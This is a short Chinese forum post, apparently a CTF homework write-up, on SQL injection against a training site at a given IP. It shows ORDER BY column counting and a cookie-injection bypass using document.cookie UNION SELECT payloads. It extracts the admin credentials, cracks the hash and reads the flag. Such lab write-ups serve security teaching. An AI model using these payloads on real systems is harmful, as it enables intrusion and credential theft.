sql注入原理2作业提交

mrchen   ·   发表于 2018-07-15 14:54:18   ·   CTF&WP专版

 1、进入靶场使用order by 10查询字段返回正常,使用order by 11 返回错误页面,得知数据库字段为10.

 2、使用union select 1,2,3,4,5,6,7,8,9,10 from admin 猜解表名是否为admin。显示错误,语句被过滤。

                                        

3、使用cookie注入语句javascript:alert(document.cookie="id="+escape("171")),打开页面http://120.203.13.111:8001/shownews.asp?显示正常,说明id=171以cookie形式传入数据库。

4、使用语句javascript:alert(document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin"))猜解表名是否为admin进行弹窗,打开原来http://120.203.13.111:8001/shownews.asp?网址页面回显2,3,7,8,9字段。

5、使用javascript:alert(document.cookie="id="+escape("171 union select 1,username,password,4,5,6,7,8,9,10 from admin"))对用户名和密码进行查询进行弹窗,打开原来网址http://120.203.13.111:8001/shownews.asp?回显username为adminpassword为b9a2a2b5dffb918c经cmd5解密获得密码welcom。

6、登陆后台获得flagzkz{welcome-control}

打赏我,让我更有动力~

0 条回复   |  直到 2018-7-15 | 1221 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.